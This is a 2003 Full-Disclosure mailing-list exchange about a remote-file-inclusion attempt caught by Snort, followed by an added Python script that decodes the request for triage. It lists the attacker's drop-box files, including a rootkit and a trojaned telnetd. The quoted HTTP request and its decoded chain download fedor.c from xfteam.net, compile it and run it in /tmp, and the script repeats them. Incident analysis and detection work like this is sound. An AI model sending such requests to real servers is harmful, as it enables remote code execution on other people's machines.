Message-ID: <3FC1D956.6010507@phrick.net>
From: gml at phrick.net (gml)
Subject: http://xfteam.net/fedor.c - Anyone seen this before??

I've attached a copy of the archive; I was able to retrieve it, apparently.
It's sd's client code for his tty shell. Looks like you've stumbled onto
someone's private warez repository. The root of xfteam.net is just full of fun stuff:

Parent Directory <http://xfteam.net/>        20-Nov-2003 16:14      -  
 c4 <http://xfteam.net/c4>                      15-Nov-2003 10:49    19k  
 cgi-bin/ <http://xfteam.net/cgi-bin/>                20-Nov-2003 16:13      -  
 cmd.jpg.php <http://xfteam.net/cmd.jpg.php>             15-Nov-2003 10:49     1k  
 cmd.txt <http://xfteam.net/cmd.txt>                 15-Nov-2003 10:47     1k  
 f <http://xfteam.net/f>                       20-Nov-2003 13:01    28k  
 fedor.c <http://xfteam.net/fedor.c>                 15-Nov-2003 10:47     5k  
 forum/ <http://xfteam.net/forum/>                  04-Nov-2003 22:05      -  
 google.jpg <http://xfteam.net/google.jpg>              19-Nov-2003 19:56   106k  
 hax.gif <http://xfteam.net/hax.gif>                 19-Nov-2003 23:38     1k  
 iomash.c <http://xfteam.net/iomash.c>                16-Nov-2003 16:30     2k  
 kmod <http://xfteam.net/kmod>                    15-Nov-2003 10:47    17k  
 mail/ <http://xfteam.net/mail/>                   20-Nov-2003 16:13      -  
 putty.exe <http://xfteam.net/putty.exe>               19-Nov-2003 12:36   220k  
 remote.php <http://xfteam.net/remote.php>              15-Nov-2003 10:49    87k  
 strings.txt <http://xfteam.net/strings.txt>             15-Nov-2003 10:44     3k  
 telnetd <http://xfteam.net/telnetd>                 16-Nov-2003 16:29   167k  

I'm of the opinion this is someone's drop box: they drop off code here that they are going to later download and compile on a target machine.
The file c4 is a SucKIT variant, also by SD, very popular with the Linux kids. kmod is ptrace-kmod.c in ELF. telnetd is what you would expect:
it's a trojaned telnetd binary. These binaries also appear to be infected with an RST variant:
http://dump.cryptobeacon.net/papers/RST-Variant%20Analysis.txt. I wonder if your attacker knows this or not. If not, I feel really bad
for anyone he's attacked. Who says unix virii aren't effective?

yawn.


char sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80";



Dan wrote:

>Hi,
>Our Snort picked up an interesting attempt to download, compile and execute.
>Noting also the fact that the sub dir it's attempting to access has not been
>there for over 4 months (/logjam/)?
>
>Has anyone actually seen what this fedor.c is? I have done some googling but
>it comes up blank.
>
>Has anyone else noticed this kind of request recently?
>
>Is it just me or is xfteam.net not resolving anyway?
>
>Original HTTP request:
>GET /logjam/showhits.php?
>rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
>
>Breaking this down we get(twice):
>uname -a
>cd /tmp
>wget http://xfteam.net/fedor.c
>gcc -o f fedor.c
>./f
>
>
>Regards,
>Daniel.
>
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>  
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xfteam.net.tar.gz
Type: application/gzip
Size: 336732 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031124/3ddc416e/xfteam.net.tar.bin
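The request Dan quoted, decoded the way a responder would before writing a signature for it: the remote URL handed to rel_path is the inclusion, and each cmd parameter carries a ';'-chained download, compile and run sequence. This is an added Python example and not code from the thread: the request line is the one posted above, while the triage_request function, its verdict labels and the set of "stage" verbs are this example's own assumptions.

```python
"""Decode and triage the suspected remote-file-inclusion request quoted
in the thread.  Added example, not code from the original message: the
request line is the one Dan posted; the parsing logic, the verdict
labels and the name triage_request are this example's own."""
from __future__ import annotations

from urllib.parse import unquote

# Request line as quoted in the thread (method and target only, no HTTP version).
REQUEST_LINE = (
    "GET /logjam/showhits.php?"
    "rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;"
    "wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f"
    "?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;"
    "gcc%20-o%20f%20fedor.c;./f"
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Verbs of the download-compile-run pattern the thread describes (assumed list).
STAGE_VERBS = {"wget", "curl", "fetch", "gcc", "cc", "chmod"}


def split_query(query: str) -> list[tuple[str, str]]:
    """Split on '&' only and percent-decode each value.  Done by hand rather
    than with parse_qsl: Python versions before 3.9.2 also split on ';',
    which would break the shell command chain apart before inspection."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        pairs.append((key, unquote(value)))
    return pairs


def split_commands(value: str) -> list[str]:
    """Break a shell command chain on ';'.  A trailing '?' is dropped: it is
    there so that anything the script appends to the value lands in a
    harmless query string instead of on the end of the last command."""
    cleaned = value.rstrip("?")
    return [c.strip() for c in cleaned.split(";") if c.strip()]


def triage_request(request_line: str) -> dict:
    """Return the path, remote URLs passed as parameters, the command chains
    found in 'cmd' parameters, the stage verbs seen, and a verdict label."""
    _method, _, target = request_line.partition(" ")
    path, _, query = target.partition("?")
    remote_includes: list[tuple[str, str]] = []
    commands: list[list[str]] = []
    for key, value in split_query(query):
        if value.startswith(REMOTE_SCHEMES):
            remote_includes.append((key, value.rstrip("?")))
        if key == "cmd":
            commands.append(split_commands(value))
    verbs = sorted({c.split()[0] for chain in commands for c in chain
                    if c.split()[0] in STAGE_VERBS})
    executes_local = any(c.startswith("./") for chain in commands for c in chain)
    if remote_includes and commands:
        verdict = "remote include with command chain"
    elif remote_includes:
        verdict = "remote include"
    elif commands:
        verdict = "command parameter"
    else:
        verdict = "no indicators"
    return {
        "path": path,
        "remote_includes": remote_includes,
        "commands": commands,
        "stage_verbs": verbs,
        "executes_local_file": executes_local,
        "verdict": verdict,
    }


if __name__ == "__main__":
    report = triage_request(REQUEST_LINE)
    print(report["verdict"])
    for chain in report["commands"]:
        for step in chain:
            print("  ", step)
```

Splitting only on '&' is deliberate: the same request fed to a decoder that also treats ';' as a parameter separator yields a dozen meaningless keys and hides the chain entirely, so a detection rule written from that view would never match. The trailing '?' on rel_path and on the first cmd value is part of the indicator, not noise; keep it in the raw sample even though the decoded report strips it.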
